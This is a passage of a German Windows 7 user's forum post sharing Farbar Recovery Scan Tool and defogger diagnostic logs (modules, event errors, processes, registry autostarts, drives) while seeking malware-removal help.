2005-04-06 16:53 - 2005-04-06 16:53 - 00057453 _____ () C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\jre\bin\verify.dll
2005-04-06 16:53 - 2005-04-06 16:53 - 00102515 _____ () C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\jre\bin\java.dll
2005-04-06 16:53 - 2005-04-06 16:53 - 00053364 _____ () C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\jre\bin\zip.dll
2005-04-06 16:53 - 2005-04-06 16:53 - 00057455 _____ () C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\jre\bin\net.dll
2005-04-06 16:53 - 2005-04-06 16:53 - 00032880 _____ () C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\jre\bin\nio.dll
2005-04-06 16:53 - 2005-04-06 16:53 - 00434255 _____ () C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\bin\ps-rw-vc-v8_58.dll
2005-04-06 16:53 - 2005-04-06 16:53 - 01019904 _____ () C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\bin\ps-vc-v8_58.dll
2012-11-28 14:13 - 2012-11-28 14:13 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2012-11-28 14:13 - 2012-11-28 14:13 - 01242512 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-05-28 19:47 - 2011-08-23 09:04 - 00057344 _____ () C:\Program Files (x86)\WinTV\TVServer\libhdhomerun.dll
2012-05-28 17:02 - 2012-01-16 16:12 - 00018944 _____ () C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServerps.dll
2009-02-03 02:33 - 2009-02-03 02:33 - 00460199 _____ () C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\sqlite3.dll
2010-05-06 03:24 - 2010-05-06 03:24 - 00151584 _____ () C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyHook.dll
2010-12-25 20:53 - 2006-01-12 21:20 - 00019968 _____ () C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Distillr\acrotray.deu
2010-12-25 20:53 - 2006-01-12 21:13 - 00019968 _____ () C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Distillr\acrotray.FRA
2010-12-18 20:25 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2007-08-31 17:13 - 2007-08-31 17:13 - 01336600 _____ () C:\Program Files (x86)\Acronis\TrueImageHome\fox.dll
2011-07-29 00:09 - 2011-07-29 00:09 - 00096112 _____ () C:\Program Files (x86)\DivX\DivX Update\DivXUpdateCheck.dll
2008-09-29 02:55 - 2008-09-29 02:55 - 01076224 _____ () C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\ACE.dll
2013-10-19 00:55 - 2013-10-19 00:55 - 25100288 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\libcef.dll
2014-01-08 11:15 - 2010-09-17 09:00 - 12832768 _____ () C:\Program Files (x86)\Common Files\PDFCreator\GS9.00\gs9.00\Bin\gsdll32.dll
2013-12-12 07:59 - 2013-12-12 07:59 - 03559024 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll

==================== Alternate Data Streams (whitelisted) =========

AlternateDataStreams: C:\ProgramData\Temp:CB0AACC9

==================== Safe Mode (whitelisted) ===================


==================== Faulty Device Manager Devices =============

Name: Standardtastatur (PS/2)
Description: Standardtastatur (PS/2)
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standardtastaturen)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: Microsoft PS/2-Maus
Description: Microsoft PS/2-Maus
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Event log errors: =========================

Application errors:
==================
Error: (01/15/2014 08:11:12 AM) (Source: SideBySide) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "assemblyIdentity1". Fehler in Manifest- oder Richtliniendatei "assemblyIdentity2" in Zeile assemblyIdentity3.
Der Wert "MAJOR_VERSION.MINOR_VERSION.BUILD_NUMBER_MAJOR.BUILD_NUMBER_MINOR" des "version"-Attributs im assemblyIdentity-Element ist ungültig.

Error: (01/15/2014 07:17:22 AM) (Source: Bonjour Service) (User: )
Description: mDNSCoreReceiveResponse: Unexpected conflict discarding   17 66.178.168.192.in-addr.arpa. PTR *****-PC.local.

Error: (01/15/2014 07:17:22 AM) (Source: Bonjour Service) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.178.66:5353   19 66.178.168.192.in-addr.arpa. PTR *****-PC-2.local.

Error: (01/14/2014 07:14:50 PM) (Source: Bonjour Service) (User: )
Description: mDNSCoreReceiveResponse: Unexpected conflict discarding   17 66.178.168.192.in-addr.arpa. PTR *****-PC.local.

Error: (01/14/2014 07:14:50 PM) (Source: Bonjour Service) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.178.66:5353   19 66.178.168.192.in-addr.arpa. PTR *****-PC-2.local.

Error: (01/14/2014 07:11:51 PM) (Source: Bonjour Service) (User: )
Description: mDNSCoreReceiveResponse: Unexpected conflict discarding   17 66.178.168.192.in-addr.arpa. PTR *****-PC.local.

Error: (01/14/2014 07:11:51 PM) (Source: Bonjour Service) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.178.66:5353   19 66.178.168.192.in-addr.arpa. PTR *****-PC-2.local.

Error: (01/14/2014 07:35:47 AM) (Source: SideBySide) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "assemblyIdentity1". Fehler in Manifest- oder Richtliniendatei "assemblyIdentity2" in Zeile assemblyIdentity3.
Der Wert "MAJOR_VERSION.MINOR_VERSION.BUILD_NUMBER_MAJOR.BUILD_NUMBER_MINOR" des "version"-Attributs im assemblyIdentity-Element ist ungültig.

Error: (01/14/2014 06:28:04 AM) (Source: Bonjour Service) (User: )
Description: mDNSCoreReceiveResponse: Unexpected conflict discarding   17 66.178.168.192.in-addr.arpa. PTR *****-PC.local.

Error: (01/14/2014 06:28:04 AM) (Source: Bonjour Service) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.178.66:5353   19 66.178.168.192.in-addr.arpa. PTR *****-PC-2.local.


System errors:
=============
Error: (01/15/2014 07:38:11 AM) (Source: Service Control Manager) (User: )
Description: Der Dienst "NVIDIA Update Service Daemon" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1069

Error: (01/15/2014 07:38:11 AM) (Source: Service Control Manager) (User: )
Description: Der Dienst "nvUpdatusService" konnte sich nicht als ".\UpdatusUser" mit dem aktuellen Kennwort aufgrund des folgenden Fehlers anmelden: 
%%1330

Vergewissern Sie sich, dass der Dienst richtig konfiguriert ist im Dienste-Snap-In in der Microsoft Management Console (MMC).

Error: (01/15/2014 07:34:25 AM) (Source: Ntfs) (User: )
Description: Auf dem Volume "\\?\Volume{10027dd9-c2d9-11e1-a534-806e6f6e6963}" konnte der Transaktionsressourcen-Manager aufgrund eines nicht wiederholbaren Fehlers nicht gestartet werden. Der Fehlercode ist in den Daten enthalten.

Error: (01/15/2014 07:19:55 AM) (Source: Service Control Manager) (User: )
Description: Der Dienst "NVIDIA Update Service Daemon" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1069

Error: (01/15/2014 07:19:55 AM) (Source: Service Control Manager) (User: )
Description: Der Dienst "nvUpdatusService" konnte sich nicht als ".\UpdatusUser" mit dem aktuellen Kennwort aufgrund des folgenden Fehlers anmelden: 
%%1330

Vergewissern Sie sich, dass der Dienst richtig konfiguriert ist im Dienste-Snap-In in der Microsoft Management Console (MMC).

Error: (01/15/2014 07:17:53 AM) (Source: Service Control Manager) (User: )
Description: Der Dienst "Windows Media Center TV Archive Transfer Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1053

Error: (01/15/2014 07:17:53 AM) (Source: Service Control Manager) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst Windows Media Center TV Archive Transfer Service erreicht.

Error: (01/15/2014 07:16:45 AM) (Source: Ntfs) (User: )
Description: Auf dem Volume "\\?\Volume{10027dd9-c2d9-11e1-a534-806e6f6e6963}" konnte der Transaktionsressourcen-Manager aufgrund eines nicht wiederholbaren Fehlers nicht gestartet werden. Der Fehlercode ist in den Daten enthalten.

Error: (01/14/2014 07:15:02 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "Server" wurde mit folgendem Fehler beendet: 
%%13

Error: (01/14/2014 07:15:00 PM) (Source: Microsoft Antimalware) (User: )
Description: Vom Echtzeitschutz-Feature von %%860 wurde ein Fehler festgestellt

	Feature: %%886

	Fehlercode: 0x8007045b

	Fehlerbeschreibung: Der Computer wird heruntergefahren. 

	Grund: %%892


Microsoft Office Sessions:
=========================
Error: (01/27/2012 03:16:14 AM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.6654.5003, Microsoft Office Version: 12.0.6612.1000. This session lasted 141973 seconds with 60 seconds of active time.  This session ended with a crash.

Error: (01/16/2012 02:17:20 PM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.6654.5003, Microsoft Office Version: 12.0.6612.1000. This session lasted 372467 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (10/07/2011 01:39:13 PM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 14856 seconds with 240 seconds of active time.  This session ended with a crash.

Error: (10/07/2011 07:18:14 AM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6562.5003, Microsoft Office Version: 12.0.6425.1000. This session lasted 65 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (10/07/2011 07:04:15 AM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6562.5003, Microsoft Office Version: 12.0.6425.1000. This session lasted 89609 seconds with 4920 seconds of active time.  This session ended with a crash.

Error: (10/05/2011 11:24:33 AM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 14563 seconds with 60 seconds of active time.  This session ended with a crash.

Error: (10/04/2011 09:19:59 AM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 27 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (10/04/2011 09:19:21 AM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 95561 seconds with 1080 seconds of active time.  This session ended with a crash.

Error: (09/27/2011 01:21:34 PM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 338595 seconds with 360 seconds of active time.  This session ended with a crash.

Error: (09/19/2011 09:07:39 AM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 8 seconds with 0 seconds of active time.  This session ended with a crash.


==================== Memory info =========================== 

Percentage of memory in use: 47%
Total physical RAM: 6103.06 MB
Available physical RAM: 3217.85 MB
Total Pagefile: 12204.3 MB
Available Pagefile: 8446.18 MB
Total Virtual: 8192 MB
Available Virtual: 8191.8 MB

==================== Drives ================================

Drive c: (Acer) (Fixed) (Total:456.78 GB) (Free:240.97 GB) NTFS
Drive d: (Data) (Fixed) (Total:456.63 GB) (Free:312.72 GB) NTFS
Drive f: (SYSTEM RESERVED) (Fixed) (Total:0.03 GB) (Free:0 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive g: (AcerAlt) (Fixed) (Total:411.91 GB) (Free:105.53 GB) NTFS
Drive h: (DATAAlt) (Fixed) (Total:43.63 GB) (Free:30.32 GB) NTFS
Drive l: () (Removable) (Total:7.39 GB) (Free:7.39 GB) FAT32
Drive m: (Swap-M) (Fixed) (Total:1397.26 GB) (Free:479.25 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 932 GB) (Disk ID: C7CAF91E)
Partition 1: (Not Active) - (Size=18 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=457 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=457 GB) - (Type=OF Extended)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 466 GB) (Disk ID: B4768151)
Partition 1: (Not Active) - (Size=10 GB) - (Type=27)
Partition 2: (Active) - (Size=31 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=412 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=44 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 1397 GB) (Disk ID: 9526035C)
Partition 1: (Active) - (Size=-698723860480) - (Type=07 NTFS)

========================================================
Disk: 5 (Size: 7 GB) (Disk ID: 00000000)
Partition 1: (Active) - (Size=7 GB) - (Type=0B)

==================== End Of Log ============================
         
defogger_disable.log
Code:
ATTFilter
defogger_disable by jpshortstuff (23.02.10.1)
Log created at 08:42 on 15/01/2014 (*****)

Checking for autostart values...
HKCU\~\Run values retrieved.
HKLM\~\Run values retrieved.

Checking for services/drivers...


-=E.O.F=-
         
FRST.txt
Code:
ATTFilter
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 15-01-2014
Ran by ***** (administrator) on *****-PC on 15-01-2014 08:44:36
Running from G:\Users\*****\Documents\***\***** Hacker\trojaner-board.de
Windows 7 Home Premium Service Pack 1 (X64) OS Language: German Standard
Internet Explorer Version 11
Boot Mode: Normal

The only official downoad link fo FRST:
Download link for 32-Bit version: hxxp://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ 
Download link for 64-Bit Version: hxxp://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ 
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSvc.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements Organizer 8.0\PhotoshopElementsFileAgent.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\avmike.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\certsrv.exe
(Devguru Co., Ltd.) C:\Windows\SysWOW64\dgdersvc.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\esClient.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\mwlDaemon.exe
() C:\HS3 Hotelsoftware\DB-Server\bin\fbguard_hs3sr.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Registration\GregHSRW.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe
(Microsoft Corporation) C:\Windows\vVX1000.exe
(Microsoft Corporation) C:\Windows\WindowsMobile\wmdc.exe
(Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Google Inc.) C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
() C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyUtility.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec Egis Software Update\EgisUpdate.exe
(CyberLink Corp.) C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\ArcadeDeluxeAgent.exe
(Acer Corp.) C:\Program Files (x86)\Acer Arcade Deluxe\PlayMovie\PMVService.exe
(Adobe Sytems Incorporated) C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Distillr\acrotray.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe
() C:\ProgramData\DatacardService\HWDeviceService64.exe
() C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\data\database\bin\mysqld-nt.exe
(Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe
(Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TimounterMonitor.exe
(Google) C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\ControlCenter3\BrccMCtl.exe
() C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfimon.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\MWLService.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(Audible, Inc.) C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe
() C:\Program Files (x86)\Northstar\SmartCopy\SmartCopy.exe
(North Star com.) C:\Program Files (x86)\Northstar\SmartLauncher\SmartLauncher.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\WHSTrayApp.exe
(Hauppauge Computer Works, Inc.) C:\Program Files (x86)\WinTV\WinTV7\WinTVTray.exe
(Dropbox, Inc.) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\nwtsrv.exe
(pdfforge  hxxp://www.pdfforge.org/) C:\Program Files (x86)\Common Files\PDFCreator\PDFCreator.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
() C:\Program Files (x86)\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe
(Acer) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
() C:\OEM\USBDECTION\USBS3S4Detection.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\Microsoft.HomeServer.Archive.TransferService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\WHSConnector.exe
(Firebird Project) C:\HS3 Hotelsoftware\DB-Server\bin\fbserver_hs3sr.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Helios Software Solutions) C:\Program Files (x86)\TextPad 4\TextPad.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [mwlDaemon] - C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\mwlDaemon.exe [349480 2009-09-10] (Egis Technology Inc.)
HKLM\...\Run: [IAAnotif] - C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe [186904 2009-10-13] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] - C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [8312352 2009-10-28] (Realtek Semiconductor)
HKLM\...\Run: [OOTag] - C:\windows\oobeoffer\oobeoffer\ootag.exe [23072 2009-09-28] (Microsoft)
HKLM\...\Run: [Acronis Scheduler2 Service] - C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe [140568 2007-08-31] (Acronis)
HKLM\...\Run: [VX1000] - C:\Windows\vVX1000.exe [762736 2010-05-20] (Microsoft Corporation)
HKLM\...\Run: [Windows Mobile Device Center] - C:\Windows\WindowsMobile\wmdc.exe [660360 2007-05-31] (Microsoft Corporation)
HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1266912 2013-10-23] (Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [472992 2013-03-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [JMB36X IDE Setup] - C:\Windows\RaidTool\xInsIDE.exe [36864 2007-03-20] ()
HKLM-x32\...\Run: [BackupManagerTray] - C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [261888 2009-08-12] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [Hotkey Utility] - C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyUtility.exe [609312 2010-05-06] ()
HKLM-x32\...\Run: [EgisTecLiveUpdate] - C:\Program Files (x86)\EgisTec Egis Software Update\EgisUpdate.exe [199464 2009-08-04] (Egis Technology Inc.)
HKLM-x32\...\Run: [ArcadeDeluxeAgent] - C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\ArcadeDeluxeAgent.exe [128296 2009-11-16] (CyberLink Corp.)
HKLM-x32\...\Run: [PlayMovie] - C:\Program Files (x86)\Acer Arcade Deluxe\PlayMovie\PMVService.exe [181480 2009-11-12] (Acer Corp.)
HKLM-x32\...\Run: [TrayServer] - C:\Program Files (x86)\MAGIX\Video_deluxe_15\Trayserver.exe [90112 2008-08-07] (MAGIX AG)
HKLM-x32\...\Run: [Adobe Version Cue CS2] - C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe [856064 2005-04-06] (Adobe Sytems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 7.0] - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Distillr\acrotray.exe [483328 2008-04-23] (Adobe Systems Inc.)
HKLM-x32\...\Run: [] - [x]
HKLM-x32\...\Run: [BrMfcWnd] - C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1159168 2009-05-26] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [ControlCenter3] - C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [TrueImageMonitor.exe] - C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe [2622232 2007-08-31] (Acronis)
HKLM-x32\...\Run: [AcronisTimounterMonitor] - C:\Program Files (x86)\Acronis\TrueImageHome\TimounterMonitor.exe [907040 2007-08-31] (Acronis)
HKLM-x32\...\Run: [Google Desktop Search] - C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe [30192 2010-12-20] (Google)
HKLM-x32\...\Run: [LifeCam] - C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe [119152 2010-05-20] (Microsoft Corporation)
HKLM-x32\...\Run: [DivXUpdate] - C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [1259376 2011-07-29] ()
HKLM-x32\...\Run: [Adobe ARM] - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-05-11] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] - C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59280 2012-11-28] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] - C:\Program Files (x86)\iTunes\iTunesHelper.exe [152544 2012-12-12] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] - C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKCU\...\Run: [swg] - C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2009-11-18] (Google Inc.)
HKCU\...\Run: [updateMgr] - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AdobeUpdateManager.exe [313472 2006-03-30] (Adobe Systems Incorporated)
HKCU\...\Run: [KiesTrayAgent] - C:\Program Files (x86)\Samsung\Kies\/\KiesTrayAgent.exe [3365176 2010-05-14] (Samsung Electronics Co., Ltd.)
MountPoints2: {59c8f615-9a4a-11df-a62d-806e6f6e6963} - E:\wubi.exe
MountPoints2: {a6801d55-6f88-11e3-9574-90fba686407f} - I:\AutoRun.exe
MountPoints2: {a6801d61-6f88-11e3-9574-90fba686407f} - I:\AutoRun.exe
HKU\Admin\...\Run: [swg] - C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2009-11-18] (Google Inc.)
HKU\Default\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
HKU\Default User\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
HKU\UpdatusUser\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
AppInit_DLLs-x32: C:\PROGRA~2\Google\GOOGLE~3\GO36F4~1.DLL [123392 2010-12-20] (Google)
Lsa: [Authentication Packages] msv1_0 relog_ap
Startup: C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_m7811&r=17361210n705pe426v155w5741u221
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_m7811&r=17361210n705pe426v155w5741u221
SearchScopes: HKLM-x32 - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deAT409AT409
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deAT409AT409
SearchScopes: HKCU - {70D46D94-BF1E-45ED-B567-48701376298E} URL = hxxp://127.0.0.1:4664/search&s=91Tr_Mru3RxUJoRgsGdwbizWUc8?q={searchTerms}
